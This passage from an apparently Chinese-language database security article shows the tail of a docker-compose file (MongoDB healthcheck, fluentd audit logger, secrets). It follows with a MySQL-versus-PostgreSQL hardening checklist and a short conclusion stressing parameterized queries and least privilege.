      - ./mongo/mongod.conf:/etc/mongo/mongod.conf:ro
    command: >
      --config /etc/mongo/mongod.conf
    networks:
      - app_network
    deploy:
      resources:
        limits:
          memory: 512M
          cpus: '1.0'
    security_opt:
      - no-new-privileges:true
    healthcheck:
      test: echo 'db.runCommand("ping").ok' | mongosh localhost:27017/test --quiet
      interval: 10s
      timeout: 5s
      retries: 5

  # === Audit Logging ===
  audit_logger:
    image: fluent/fluentd:latest
    container_name: db-audit-logger
    restart: unless-stopped
    volumes:
      - ./fluentd/conf:/fluentd/etc:ro
      - audit_logs:/var/log/db-audit
    networks:
      - app_network

volumes:
  pg_data:
    driver: local
  mysql_data:
    driver: local
  mongo_data:
    driver: local
  audit_logs:
    driver: local

networks:
  app_network:
    driver: bridge
    ipam:
      config:
        - subnet: 172.28.0.0/16

secrets:
  pg_password:
    file: ./secrets/pg_password.txt
  mysql_root_password:
    file: ./secrets/mysql_root_password.txt
  mysql_password:
    file: ./secrets/mysql_password.txt
  mongo_root_user:
    file: ./secrets/mongo_root_user.txt
  mongo_root_password:
    file: ./secrets/mongo_root_password.txt

数据库安全加固清单速查表
#

┌─────────────────────────────────────────────────────────────────────────────┐
│                        数据库安全加固检查表                                    │
├──────────┬──────────────┬──────────────┬────────────────────────────────────┤
│ 类别     │ 检查项       │ MySQL        │ PostgreSQL                         │
├──────────┼──────────────┼──────────────┼────────────────────────────────────┤
│ 认证     │ 强密码策略   │ validate_    │ scram-sha-256 +                    │
│          │              │ password     │ pg_hba.conf 控制                   │
│          ├──────────────┼──────────────┼────────────────────────────────────┤
│          │ 默认账户清理 │ 删除匿名账户 │ 删除 public schema 权限             │
│          ├──────────────┼──────────────┼────────────────────────────────────┤
│          │ 密码过期     │ 支持         │ ALTER USER ... VALID UNTIL          │
├──────────┼──────────────┼──────────────┼────────────────────────────────────┤
│ 网络     │ TLS 加密     │ require_     │ ssl = on                           │
│          │              │ secure_      │                                    │
│          │              │ transport    │                                    │
│          ├──────────────┼──────────────┼────────────────────────────────────┤
│          │ 绑定地址     │ 127.0.0.1    │ listen_addresses                   │
├──────────┼──────────────┼──────────────┼────────────────────────────────────┤
│ 权限     │ 最小权限     │ GRANT 精确   │ 角色 + 列级权限                    │
│          ├──────────────┼──────────────┼────────────────────────────────────┤
│          │ 删除权限     │ REVOKE 不必要│ DROP PUBLIC 权限                   │
│          │              │ 的 GRANT     │                                    │
├──────────┼──────────────┼──────────────┼────────────────────────────────────┤
│ 加密     │ TDE          │ InnoDB       │ pgcrypto / pg_tde                  │
│          │              │ encryption   │                                    │
│          ├──────────────┼──────────────┼────────────────────────────────────┤
│          │ 列级加密     │ AES_ENCRYPT  │ pgp_sym_encrypt                    │
│          ├──────────────┼──────────────┼────────────────────────────────────┤
│          │ 密码哈希     │ caching_     │ scram-sha-256                      │
│          │              │ sha256 +     │ + crypt() (bcrypt)                 │
│          │              │ bcrypt       │                                    │
├──────────┼──────────────┼──────────────┼────────────────────────────────────┤
│ 审计     │ 查询日志     │ general_log  │ log_statement = 'ddl'              │
│          │              │ (谨慎使用)   │ + pgaudit                          │
│          ├──────────────┼──────────────┼────────────────────────────────────┤
│          │ 连接审计     │ audit_log    │ log_connections /                  │
│          │              │ plugin       │ log_disconnections                 │
├──────────┼──────────────┼──────────────┼────────────────────────────────────┤
│ 备份     │ 加密备份     │ mysql_       │ pg_dump + gpg                      │
│          │              │ backup       │                                    │
│          │              │ --ssl-mode   │                                    │
└──────────┴──────────────┴──────────────┴────────────────────────────────────┘

结语
#

数据库安全加固是一项持续性的工程实践,而非一次性的配置任务。从配置审计到注入防御,从加密方案到监控体系,每个环节都需要认真对待。最关键的原则是:永远不要信任用户输入,永远使用参数化查询,永远遵循最小权限原则。

在实际的安全评估中,我见过太多因为一个默认密码、一条宽松 GRANT 语句、一个未参数化的查询而导致的数据泄露事件。做好数据库安全,从今天的配置审计开始。